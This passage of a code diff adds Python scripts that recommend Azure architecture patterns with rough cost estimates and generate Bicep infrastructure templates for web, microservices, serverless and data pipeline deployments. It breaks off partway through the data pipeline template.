+        "use_case": "Complex SaaS, multi-team microservices, high-scale platforms",
+        "service_stack": [
+            "AKS (3 node pools: system, app, jobs)",
+            "API Management (Standard v2)",
+            "Cosmos DB (multi-model)",
+            "Service Bus (Standard)",
+            "Azure Container Registry",
+            "Azure Monitor + Application Insights",
+            "Key Vault",
+            "Entra ID workload identity",
+        ],
+        "estimated_monthly_cost_usd": min(1200, budget),
+        "cost_breakdown": {
+            "AKS node pools (D4s_v5 x3)": "$350-500",
+            "API Management Standard v2": "$175",
+            "Cosmos DB": "$100-400",
+            "Service Bus Standard": "$10-50",
+            "Container Registry Basic": "$5",
+            "Azure Monitor": "$50-100",
+            "Key Vault": "$1-5",
+        },
+        "pros": [
+            "Full Kubernetes ecosystem",
+            "Independent scaling per service",
+            "Multi-language and multi-framework",
+            "Mature ecosystem (Helm, Keda, Dapr)",
+            "Workload identity — no credentials in pods",
+        ],
+        "cons": [
+            "Kubernetes operational complexity",
+            "Higher baseline cost",
+            "Requires dedicated platform team",
+            "Networking (CNI, ingress) configuration heavy",
+        ],
+        "scaling": {
+            "users_supported": "10k - 10M",
+            "requests_per_second": "1,000 - 1,000,000",
+            "method": "Cluster autoscaler + KEDA event-driven autoscaling",
+        },
+    }
+
+
+def _container_apps(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 500)
+    return {
+        "recommended_pattern": "container_apps",
+        "description": "Serverless containers on Azure Container Apps",
+        "use_case": "Microservices without Kubernetes management overhead",
+        "service_stack": [
+            "Azure Container Apps",
+            "Azure Container Registry",
+            "Cosmos DB",
+            "Service Bus",
+            "Key Vault",
+            "Application Insights",
+            "Entra ID managed identity",
+        ],
+        "estimated_monthly_cost_usd": min(350, budget),
+        "cost_breakdown": {
+            "Container Apps (consumption)": "$50-150",
+            "Container Registry Basic": "$5",
+            "Cosmos DB": "$50-150",
+            "Service Bus Standard": "$10-30",
+            "Key Vault": "$1-5",
+            "Application Insights": "$5-20",
+        },
+        "pros": [
+            "Serverless containers — scale to zero",
+            "Built-in Dapr integration",
+            "KEDA autoscaling included",
+            "No cluster management",
+            "Simpler networking than AKS",
+        ],
+        "cons": [
+            "Less control than full AKS",
+            "Limited to HTTP and event-driven workloads",
+            "Smaller ecosystem than Kubernetes",
+            "Some advanced features still in preview",
+        ],
+        "scaling": {
+            "users_supported": "1k - 500k",
+            "requests_per_second": "100 - 50,000",
+            "method": "KEDA scalers (HTTP, queue length, CPU, custom)",
+        },
+    }
+
+
+def _serverless_functions(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 300)
+    return {
+        "recommended_pattern": "serverless_functions",
+        "description": "Azure Functions with Event Grid and Cosmos DB",
+        "use_case": "Event-driven backends, APIs, scheduled jobs, webhooks",
+        "service_stack": [
+            "Azure Functions (Consumption plan)",
+            "Event Grid",
+            "Service Bus",
+            "Cosmos DB (Serverless)",
+            "Azure Blob Storage",
+            "Application Insights",
+            "Key Vault",
+        ],
+        "estimated_monthly_cost_usd": min(80, budget),
+        "cost_breakdown": {
+            "Functions (Consumption)": "$0-20 (1M free executions/month)",
+            "Event Grid": "$0-5",
+            "Service Bus Basic": "$0-10",
+            "Cosmos DB Serverless": "$5-40",
+            "Blob Storage": "$2-10",
+            "Application Insights": "$5-15",
+        },
+        "pros": [
+            "Pay-per-execution — true serverless",
+            "Scale to zero, scale to millions",
+            "Multiple trigger types (HTTP, queue, timer, blob, event)",
+            "Durable Functions for orchestration",
+            "Fast development cycle",
+        ],
+        "cons": [
+            "Cold start latency (1-5s on consumption plan)",
+            "10-minute execution timeout on consumption plan",
+            "Limited local development experience",
+            "Debugging distributed functions is complex",
+        ],
+        "scaling": {
+            "users_supported": "1k - 1M",
+            "requests_per_second": "100 - 100,000",
+            "method": "Automatic (Azure Functions runtime scales instances)",
+        },
+    }
+
+
+def _synapse_pipeline(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 1500)
+    return {
+        "recommended_pattern": "synapse_pipeline",
+        "description": "Data pipeline with Event Hubs, Synapse, and Data Lake",
+        "use_case": "Data warehousing, ETL, analytics, ML pipelines",
+        "service_stack": [
+            "Event Hubs (Standard)",
+            "Data Factory / Synapse Pipelines",
+            "Data Lake Storage Gen2",
+            "Synapse Analytics (Serverless SQL pool)",
+            "Azure Functions (processing)",
+            "Power BI",
+            "Azure Monitor",
+        ],
+        "estimated_monthly_cost_usd": min(800, budget),
+        "cost_breakdown": {
+            "Event Hubs Standard": "$20-80",
+            "Data Factory": "$50-200",
+            "Data Lake Storage Gen2": "$20-80",
+            "Synapse Serverless SQL": "$50-300 (per TB scanned)",
+            "Azure Functions": "$10-40",
+            "Power BI Pro": "$10/user/month",
+        },
+        "pros": [
+            "Unified analytics platform (Synapse)",
+            "Serverless SQL — pay per query",
+            "Native Spark integration",
+            "Data Lake Gen2 — hierarchical namespace, cheap storage",
+            "Built-in data integration (90+ connectors)",
+        ],
+        "cons": [
+            "Synapse learning curve",
+            "Cost unpredictable with serverless SQL at scale",
+            "Complex permissions model (Synapse RBAC + storage ACLs)",
+            "Spark pool startup time",
+        ],
+        "scaling": {
+            "events_per_second": "1,000 - 10,000,000",
+            "data_volume": "1 GB - 1 PB per day",
+            "method": "Event Hubs throughput units + Synapse auto-scale",
+        },
+    }
+
+
+def _serverless_data(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 300)
+    return {
+        "recommended_pattern": "serverless_data",
+        "description": "Lightweight data pipeline with Functions and Data Lake",
+        "use_case": "Small-scale ETL, event processing, log aggregation",
+        "service_stack": [
+            "Azure Functions",
+            "Event Grid",
+            "Data Lake Storage Gen2",
+            "Azure SQL Serverless",
+            "Application Insights",
+        ],
+        "estimated_monthly_cost_usd": min(120, budget),
+        "cost_breakdown": {
+            "Azure Functions": "$0-20",
+            "Event Grid": "$0-5",
+            "Data Lake Storage Gen2": "$5-20",
+            "Azure SQL Serverless": "$20-60",
+            "Application Insights": "$5-15",
+        },
+        "pros": [
+            "Very low cost for small volumes",
+            "Serverless end-to-end",
+            "Simple to operate",
+            "Scales automatically",
+        ],
+        "cons": [
+            "Not suitable for high-volume analytics",
+            "Limited transformation capabilities",
+            "No built-in orchestration (use Durable Functions)",
+        ],
+        "scaling": {
+            "events_per_second": "10 - 10,000",
+            "data_volume": "1 MB - 100 GB per day",
+            "method": "Azure Functions auto-scale",
+        },
+    }
+
+
+def _multi_region_web(users: int, reqs: Dict) -> Dict[str, Any]:
+    budget = reqs.get("budget_monthly_usd", 5000)
+    return {
+        "recommended_pattern": "multi_region_web",
+        "description": "Multi-region active-active deployment with Front Door",
+        "use_case": "Global applications, 99.99% uptime, data residency compliance",
+        "service_stack": [
+            "Azure Front Door (Premium)",
+            "App Service (2+ regions) or AKS (2+ regions)",
+            "Cosmos DB (multi-region writes)",
+            "Azure SQL (geo-replication or failover groups)",
+            "Traffic Manager (DNS failover)",
+            "Azure Monitor + Log Analytics (centralized)",
+            "Key Vault (per region)",
+        ],
+        "estimated_monthly_cost_usd": min(3000, budget),
+        "cost_breakdown": {
+            "Front Door Premium": "$100-200",
+            "Compute (2 regions)": "$300-1000",
+            "Cosmos DB (multi-region)": "$400-1500",
+            "Azure SQL geo-replication": "$200-600",
+            "Monitoring": "$50-150",
+            "Data transfer (cross-region)": "$50-200",
+        },
+        "pros": [
+            "Global low latency",
+            "99.99% availability",
+            "Automatic failover",
+            "Data residency compliance",
+            "Front Door WAF at the edge",
+        ],
+        "cons": [
+            "1.5-2x cost vs single region",
+            "Data consistency challenges (Cosmos DB conflict resolution)",
+            "Complex deployment pipeline",
+            "Cross-region data transfer costs",
+        ],
+        "scaling": {
+            "users_supported": "100k - 100M",
+            "requests_per_second": "10,000 - 10,000,000",
+            "method": "Per-region autoscale + Front Door global routing",
+        },
+    }
+
+
+PATTERN_DISPATCH = {
+    "app_service_web": _app_service_web,
+    "app_service_scaled": _app_service_web,  # same builder, cost adjusts
+    "aks_microservices": _aks_microservices,
+    "container_apps": _container_apps,
+    "serverless_functions": _serverless_functions,
+    "synapse_pipeline": _synapse_pipeline,
+    "serverless_data": _serverless_data,
+    "multi_region_web": _multi_region_web,
+}
+
+
+# ---------------------------------------------------------------------------
+# Core recommendation logic
+# ---------------------------------------------------------------------------
+
+def recommend(app_type: str, users: int, requirements: Dict) -> Dict[str, Any]:
+    """Return architecture recommendation for the given inputs."""
+    bucket = _size_bucket(users)
+    patterns = ARCHITECTURE_PATTERNS.get(app_type, ARCHITECTURE_PATTERNS["web_app"])
+    pattern_key = patterns.get(bucket, "app_service_web")
+    builder = PATTERN_DISPATCH.get(pattern_key, _app_service_web)
+    result = builder(users, requirements)
+
+    # Add compliance notes if relevant
+    compliance = requirements.get("compliance", [])
+    if compliance:
+        result["compliance_notes"] = []
+        if "HIPAA" in compliance:
+            result["compliance_notes"].append(
+                "Enable Microsoft Defender for Cloud, BAA agreement, audit logging, encryption at rest with CMK"
+            )
+        if "SOC2" in compliance:
+            result["compliance_notes"].append(
+                "Azure Policy SOC 2 initiative, Defender for Cloud regulatory compliance dashboard"
+            )
+        if "GDPR" in compliance:
+            result["compliance_notes"].append(
+                "Data residency in EU region, Purview for data classification, consent management"
+            )
+        if "ISO27001" in compliance or "ISO 27001" in compliance:
+            result["compliance_notes"].append(
+                "Azure Policy ISO 27001 initiative, audit logs to Log Analytics, access reviews in Entra ID"
+            )
+
+    return result
+
+
+def generate_checklist(result: Dict[str, Any]) -> List[Dict[str, Any]]:
+    """Return an implementation checklist for the recommended architecture."""
+    services = result.get("service_stack", [])
+    return [
+        {
+            "phase": "Planning",
+            "tasks": [
+                "Review architecture pattern and Azure services",
+                "Estimate costs with Azure Pricing Calculator",
+                "Define environment strategy (dev, staging, production)",
+                "Set up Azure subscription and resource groups",
+                "Define tagging strategy (environment, owner, cost-center, app-name)",
+            ],
+        },
+        {
+            "phase": "Foundation",
+            "tasks": [
+                "Create VNet with subnets (app, data, management)",
+                "Configure NSGs and Private Endpoints",
+                "Set up Entra ID groups and RBAC assignments",
+                "Create Key Vault and seed with initial secrets",
+                "Enable Microsoft Defender for Cloud",
+            ],
+        },
+        {
+            "phase": "Core Services",
+            "tasks": [f"Deploy {svc}" for svc in services],
+        },
+        {
+            "phase": "Security",
+            "tasks": [
+                "Enable Managed Identity on all services",
+                "Configure Private Endpoints for PaaS resources",
+                "Set up Application Gateway or Front Door with WAF",
+                "Assign Azure Policy initiatives (CIS, SOC 2, etc.)",
+                "Enable diagnostic settings on all resources",
+            ],
+        },
+        {
+            "phase": "Monitoring",
+            "tasks": [
+                "Create Log Analytics workspace",
+                "Enable Application Insights for all services",
+                "Create Azure Monitor alert rules for critical metrics",
+                "Set up Action Groups for notifications (email, Teams, PagerDuty)",
+                "Create Azure Dashboard for operational visibility",
+            ],
+        },
+        {
+            "phase": "CI/CD",
+            "tasks": [
+                "Set up Azure DevOps or GitHub Actions pipeline",
+                "Configure workload identity federation (no secrets in CI)",
+                "Implement Bicep deployment pipeline with what-if preview",
+                "Set up staging slots or blue-green deployment",
+                "Document rollback procedures",
+            ],
+        },
+    ]
+
+
+# ---------------------------------------------------------------------------
+# CLI
+# ---------------------------------------------------------------------------
+
+def _format_text(result: Dict[str, Any]) -> str:
+    lines = []
+    lines.append(f"Pattern: {result['recommended_pattern']}")
+    lines.append(f"Description: {result['description']}")
+    lines.append(f"Use Case: {result['use_case']}")
+    lines.append(f"Estimated Monthly Cost: ${result['estimated_monthly_cost_usd']}")
+    lines.append("")
+    lines.append("Service Stack:")
+    for svc in result.get("service_stack", []):
+        lines.append(f"  - {svc}")
+    lines.append("")
+    lines.append("Cost Breakdown:")
+    for k, v in result.get("cost_breakdown", {}).items():
+        lines.append(f"  {k}: {v}")
+    lines.append("")
+    lines.append("Pros:")
+    for p in result.get("pros", []):
+        lines.append(f"  + {p}")
+    lines.append("")
+    lines.append("Cons:")
+    for c in result.get("cons", []):
+        lines.append(f"  - {c}")
+    if result.get("compliance_notes"):
+        lines.append("")
+        lines.append("Compliance Notes:")
+        for note in result["compliance_notes"]:
+            lines.append(f"  * {note}")
+    lines.append("")
+    lines.append("Scaling:")
+    for k, v in result.get("scaling", {}).items():
+        lines.append(f"  {k}: {v}")
+    return "\n".join(lines)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Azure Architecture Designer — recommend Azure architecture patterns based on application requirements.",
+        epilog="Examples:\n"
+               "  python architecture_designer.py --app-type web_app --users 10000\n"
+               "  python architecture_designer.py --app-type microservices --users 50000 --json\n"
+               '  python architecture_designer.py --app-type serverless --users 5000 --requirements \'{"compliance":["HIPAA"]}\'',
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+    )
+    parser.add_argument(
+        "--app-type",
+        required=True,
+        choices=["web_app", "saas_platform", "mobile_backend", "microservices", "data_pipeline", "serverless"],
+        help="Application type to design for",
+    )
+    parser.add_argument(
+        "--users",
+        type=int,
+        default=1000,
+        help="Expected number of users (default: 1000)",
+    )
+    parser.add_argument(
+        "--requirements",
+        type=str,
+        default="{}",
+        help="JSON string of additional requirements (budget_monthly_usd, compliance, etc.)",
+    )
+    parser.add_argument(
+        "--checklist",
+        action="store_true",
+        help="Include implementation checklist in output",
+    )
+    parser.add_argument(
+        "--json",
+        action="store_true",
+        dest="json_output",
+        help="Output as JSON instead of human-readable text",
+    )
+
+    args = parser.parse_args()
+
+    try:
+        reqs = json.loads(args.requirements)
+    except json.JSONDecodeError as exc:
+        print(f"Error: invalid --requirements JSON: {exc}", file=sys.stderr)
+        sys.exit(1)
+
+    result = recommend(args.app_type, args.users, reqs)
+
+    if args.checklist:
+        result["implementation_checklist"] = generate_checklist(result)
+
+    if args.json_output:
+        print(json.dumps(result, indent=2))
+    else:
+        print(_format_text(result))
+        if args.checklist:
+            print("\n--- Implementation Checklist ---")
+            for phase in result["implementation_checklist"]:
+                print(f"\n{phase['phase']}:")
+                for task in phase["tasks"]:
+                    print(f"  [ ] {task}")
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering-team/azure-cloud-architect/scripts/bicep_generator.py
+++ b/engineering-team/azure-cloud-architect/scripts/bicep_generator.py
@@ -0,0 +1,775 @@
+#!/usr/bin/env python3
+"""
+Azure Bicep template generator.
+Generates Bicep infrastructure-as-code scaffolds for common Azure architecture patterns.
+
+Usage:
+    python bicep_generator.py --arch-type web-app
+    python bicep_generator.py --arch-type microservices --output main.bicep
+    python bicep_generator.py --arch-type serverless --json
+    python bicep_generator.py --help
+"""
+
+import argparse
+import json
+import sys
+from typing import Dict
+
+
+# ---------------------------------------------------------------------------
+# Bicep templates
+# ---------------------------------------------------------------------------
+
+def _web_app_template() -> str:
+    return r"""// =============================================================================
+// Azure Web App Architecture — Bicep Template
+// App Service + Azure SQL + Front Door + Key Vault + Application Insights
+// =============================================================================
+
+@description('Environment name')
+@allowed(['dev', 'staging', 'production'])
+param environment string = 'dev'
+
+@description('Azure region')
+param location string = resourceGroup().location
+
+@description('Application name (lowercase, no spaces)')
+@minLength(3)
+@maxLength(20)
+param appName string
+
+@description('SQL admin Entra ID object ID')
+param sqlAdminObjectId string
+
+// ---------------------------------------------------------------------------
+// Key Vault
+// ---------------------------------------------------------------------------
+
+resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
+  name: '${environment}-${appName}-kv'
+  location: location
+  properties: {
+    sku: { family: 'A', name: 'standard' }
+    tenantId: subscription().tenantId
+    enableRbacAuthorization: true
+    enableSoftDelete: true
+    softDeleteRetentionInDays: 30
+    networkAcls: {
+      defaultAction: 'Deny'
+      bypass: 'AzureServices'
+    }
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// App Service Plan + App Service
+// ---------------------------------------------------------------------------
+
+resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
+  name: '${environment}-${appName}-plan'
+  location: location
+  sku: {
+    name: environment == 'production' ? 'P1v3' : 'B1'
+    tier: environment == 'production' ? 'PremiumV3' : 'Basic'
+    capacity: 1
+  }
+  properties: {
+    reserved: true // Linux
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource appService 'Microsoft.Web/sites@2023-01-01' = {
+  name: '${environment}-${appName}-web'
+  location: location
+  properties: {
+    serverFarmId: appServicePlan.id
+    httpsOnly: true
+    siteConfig: {
+      linuxFxVersion: 'NODE|20-lts'
+      minTlsVersion: '1.2'
+      ftpsState: 'Disabled'
+      alwaysOn: environment == 'production'
+      healthCheckPath: '/health'
+    }
+  }
+  identity: {
+    type: 'SystemAssigned'
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Azure SQL (Serverless)
+// ---------------------------------------------------------------------------
+
+resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
+  name: '${environment}-${appName}-sql'
+  location: location
+  properties: {
+    administrators: {
+      administratorType: 'ActiveDirectory'
+      azureADOnlyAuthentication: true
+      principalType: 'Group'
+      sid: sqlAdminObjectId
+      tenantId: subscription().tenantId
+    }
+    minimalTlsVersion: '1.2'
+    publicNetworkAccess: environment == 'production' ? 'Disabled' : 'Enabled'
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
+  parent: sqlServer
+  name: '${appName}-db'
+  location: location
+  sku: {
+    name: 'GP_S_Gen5_2'
+    tier: 'GeneralPurpose'
+  }
+  properties: {
+    autoPauseDelay: environment == 'production' ? -1 : 60
+    minCapacity: json('0.5')
+    zoneRedundant: environment == 'production'
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Application Insights + Log Analytics
+// ---------------------------------------------------------------------------
+
+resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
+  name: '${environment}-${appName}-logs'
+  location: location
+  properties: {
+    sku: { name: 'PerGB2018' }
+    retentionInDays: environment == 'production' ? 90 : 30
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
+  name: '${environment}-${appName}-ai'
+  location: location
+  kind: 'web'
+  properties: {
+    Application_Type: 'web'
+    WorkspaceResourceId: logAnalytics.id
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Outputs
+// ---------------------------------------------------------------------------
+
+output appServiceUrl string = 'https://${appService.properties.defaultHostName}'
+output keyVaultUri string = keyVault.properties.vaultUri
+output appInsightsKey string = appInsights.properties.InstrumentationKey
+output sqlServerFqdn string = sqlServer.properties.fullyQualifiedDomainName
+"""
+
+
+def _microservices_template() -> str:
+    return r"""// =============================================================================
+// Azure Microservices Architecture — Bicep Template
+// AKS + API Management + Cosmos DB + Service Bus + Key Vault
+// =============================================================================
+
+@description('Environment name')
+@allowed(['dev', 'staging', 'production'])
+param environment string = 'dev'
+
+@description('Azure region')
+param location string = resourceGroup().location
+
+@description('Application name')
+@minLength(3)
+@maxLength(20)
+param appName string
+
+@description('AKS admin Entra ID group object ID')
+param aksAdminGroupId string
+
+// ---------------------------------------------------------------------------
+// Key Vault
+// ---------------------------------------------------------------------------
+
+resource keyVault 'Microsoft.KeyVault/vaults@2023-07-01' = {
+  name: '${environment}-${appName}-kv'
+  location: location
+  properties: {
+    sku: { family: 'A', name: 'standard' }
+    tenantId: subscription().tenantId
+    enableRbacAuthorization: true
+    enableSoftDelete: true
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// AKS Cluster
+// ---------------------------------------------------------------------------
+
+resource aksCluster 'Microsoft.ContainerService/managedClusters@2024-01-01' = {
+  name: '${environment}-${appName}-aks'
+  location: location
+  identity: { type: 'SystemAssigned' }
+  properties: {
+    dnsPrefix: '${environment}-${appName}'
+    kubernetesVersion: '1.29'
+    enableRBAC: true
+    aadProfile: {
+      managed: true
+      adminGroupObjectIDs: [aksAdminGroupId]
+      enableAzureRBAC: true
+    }
+    networkProfile: {
+      networkPlugin: 'azure'
+      networkPolicy: 'azure'
+      serviceCidr: '10.0.0.0/16'
+      dnsServiceIP: '10.0.0.10'
+    }
+    agentPoolProfiles: [
+      {
+        name: 'system'
+        count: environment == 'production' ? 3 : 1
+        vmSize: 'Standard_D2s_v5'
+        mode: 'System'
+        enableAutoScaling: true
+        minCount: 1
+        maxCount: 3
+        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
+      }
+      {
+        name: 'app'
+        count: environment == 'production' ? 3 : 1
+        vmSize: 'Standard_D4s_v5'
+        mode: 'User'
+        enableAutoScaling: true
+        minCount: 1
+        maxCount: 10
+        availabilityZones: environment == 'production' ? ['1', '2', '3'] : []
+      }
+    ]
+    addonProfiles: {
+      omsagent: {
+        enabled: true
+        config: {
+          logAnalyticsWorkspaceResourceID: logAnalytics.id
+        }
+      }
+    }
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Container Registry
+// ---------------------------------------------------------------------------
+
+resource acr 'Microsoft.ContainerRegistry/registries@2023-07-01' = {
+  name: '${environment}${appName}acr'
+  location: location
+  sku: { name: environment == 'production' ? 'Standard' : 'Basic' }
+  properties: {
+    adminUserEnabled: false
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Cosmos DB (Serverless for dev, Autoscale for prod)
+// ---------------------------------------------------------------------------
+
+resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
+  name: '${environment}-${appName}-cosmos'
+  location: location
+  kind: 'GlobalDocumentDB'
+  properties: {
+    databaseAccountOfferType: 'Standard'
+    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
+    locations: [
+      { locationName: location, failoverPriority: 0, isZoneRedundant: environment == 'production' }
+    ]
+    capabilities: environment == 'dev' ? [{ name: 'EnableServerless' }] : []
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Service Bus
+// ---------------------------------------------------------------------------
+
+resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
+  name: '${environment}-${appName}-sb'
+  location: location
+  sku: { name: 'Standard', tier: 'Standard' }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Log Analytics + Application Insights
+// ---------------------------------------------------------------------------
+
+resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
+  name: '${environment}-${appName}-logs'
+  location: location
+  properties: {
+    sku: { name: 'PerGB2018' }
+    retentionInDays: environment == 'production' ? 90 : 30
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
+  name: '${environment}-${appName}-ai'
+  location: location
+  kind: 'web'
+  properties: {
+    Application_Type: 'web'
+    WorkspaceResourceId: logAnalytics.id
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Outputs
+// ---------------------------------------------------------------------------
+
+output aksClusterName string = aksCluster.name
+output acrLoginServer string = acr.properties.loginServer
+output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
+output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
+output keyVaultUri string = keyVault.properties.vaultUri
+"""
+
+
+def _serverless_template() -> str:
+    return r"""// =============================================================================
+// Azure Serverless Architecture — Bicep Template
+// Azure Functions + Event Grid + Service Bus + Cosmos DB
+// =============================================================================
+
+@description('Environment name')
+@allowed(['dev', 'staging', 'production'])
+param environment string = 'dev'
+
+@description('Azure region')
+param location string = resourceGroup().location
+
+@description('Application name')
+@minLength(3)
+@maxLength(20)
+param appName string
+
+// ---------------------------------------------------------------------------
+// Storage Account (required by Functions)
+// ---------------------------------------------------------------------------
+
+resource storageAccount 'Microsoft.Storage/storageAccounts@2023-01-01' = {
+  name: '${environment}${appName}st'
+  location: location
+  sku: { name: 'Standard_LRS' }
+  kind: 'StorageV2'
+  properties: {
+    supportsHttpsTrafficOnly: true
+    minimumTlsVersion: 'TLS1_2'
+    allowBlobPublicAccess: false
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Azure Functions (Consumption Plan)
+// ---------------------------------------------------------------------------
+
+resource functionPlan 'Microsoft.Web/serverfarms@2023-01-01' = {
+  name: '${environment}-${appName}-func-plan'
+  location: location
+  sku: {
+    name: 'Y1'
+    tier: 'Dynamic'
+  }
+  properties: {
+    reserved: true // Linux
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource functionApp 'Microsoft.Web/sites@2023-01-01' = {
+  name: '${environment}-${appName}-func'
+  location: location
+  kind: 'functionapp,linux'
+  identity: { type: 'SystemAssigned' }
+  properties: {
+    serverFarmId: functionPlan.id
+    httpsOnly: true
+    siteConfig: {
+      linuxFxVersion: 'NODE|20'
+      minTlsVersion: '1.2'
+      ftpsState: 'Disabled'
+      appSettings: [
+        { name: 'AzureWebJobsStorage', value: 'DefaultEndpointsProtocol=https;AccountName=${storageAccount.name};EndpointSuffix=core.windows.net;AccountKey=${storageAccount.listKeys().keys[0].value}' }
+        { name: 'FUNCTIONS_EXTENSION_VERSION', value: '~4' }
+        { name: 'FUNCTIONS_WORKER_RUNTIME', value: 'node' }
+        { name: 'APPINSIGHTS_INSTRUMENTATIONKEY', value: appInsights.properties.InstrumentationKey }
+        { name: 'COSMOS_ENDPOINT', value: cosmosAccount.properties.documentEndpoint }
+        { name: 'SERVICE_BUS_CONNECTION', value: listKeys('${serviceBus.id}/AuthorizationRules/RootManageSharedAccessKey', serviceBus.apiVersion).primaryConnectionString }
+      ]
+    }
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Cosmos DB (Serverless)
+// ---------------------------------------------------------------------------
+
+resource cosmosAccount 'Microsoft.DocumentDB/databaseAccounts@2023-11-15' = {
+  name: '${environment}-${appName}-cosmos'
+  location: location
+  kind: 'GlobalDocumentDB'
+  properties: {
+    databaseAccountOfferType: 'Standard'
+    consistencyPolicy: { defaultConsistencyLevel: 'Session' }
+    locations: [
+      { locationName: location, failoverPriority: 0 }
+    ]
+    capabilities: [{ name: 'EnableServerless' }]
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Service Bus
+// ---------------------------------------------------------------------------
+
+resource serviceBus 'Microsoft.ServiceBus/namespaces@2022-10-01-preview' = {
+  name: '${environment}-${appName}-sb'
+  location: location
+  sku: { name: 'Basic', tier: 'Basic' }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource orderQueue 'Microsoft.ServiceBus/namespaces/queues@2022-10-01-preview' = {
+  parent: serviceBus
+  name: 'orders'
+  properties: {
+    maxDeliveryCount: 5
+    defaultMessageTimeToLive: 'P7D'
+    deadLetteringOnMessageExpiration: true
+    lockDuration: 'PT1M'
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Application Insights + Log Analytics
+// ---------------------------------------------------------------------------
+
+resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
+  name: '${environment}-${appName}-logs'
+  location: location
+  properties: {
+    sku: { name: 'PerGB2018' }
+    retentionInDays: 30
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource appInsights 'Microsoft.Insights/components@2020-02-02' = {
+  name: '${environment}-${appName}-ai'
+  location: location
+  kind: 'web'
+  properties: {
+    Application_Type: 'web'
+    WorkspaceResourceId: logAnalytics.id
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Outputs
+// ---------------------------------------------------------------------------
+
+output functionAppUrl string = 'https://${functionApp.properties.defaultHostName}'
+output cosmosEndpoint string = cosmosAccount.properties.documentEndpoint
+output serviceBusEndpoint string = '${serviceBus.name}.servicebus.windows.net'
+output appInsightsKey string = appInsights.properties.InstrumentationKey
+"""
+
+
+def _data_pipeline_template() -> str:
+    return r"""// =============================================================================
+// Azure Data Pipeline Architecture — Bicep Template
+// Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions
+// =============================================================================
+
+@description('Environment name')
+@allowed(['dev', 'staging', 'production'])
+param environment string = 'dev'
+
+@description('Azure region')
+param location string = resourceGroup().location
+
+@description('Application name')
+@minLength(3)
+@maxLength(20)
+param appName string
+
+// ---------------------------------------------------------------------------
+// Data Lake Storage Gen2
+// ---------------------------------------------------------------------------
+
+resource dataLake 'Microsoft.Storage/storageAccounts@2023-01-01' = {
+  name: '${environment}${appName}dl'
+  location: location
+  sku: { name: environment == 'production' ? 'Standard_ZRS' : 'Standard_LRS' }
+  kind: 'StorageV2'
+  properties: {
+    isHnsEnabled: true  // Hierarchical namespace for Data Lake Gen2
+    supportsHttpsTrafficOnly: true
+    minimumTlsVersion: 'TLS1_2'
+    allowBlobPublicAccess: false
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource rawContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
+  name: '${dataLake.name}/default/raw'
+  properties: { publicAccess: 'None' }
+}
+
+resource curatedContainer 'Microsoft.Storage/storageAccounts/blobServices/containers@2023-01-01' = {
+  name: '${dataLake.name}/default/curated'
+  properties: { publicAccess: 'None' }
+}
+
+// ---------------------------------------------------------------------------
+// Event Hubs
+// ---------------------------------------------------------------------------
+
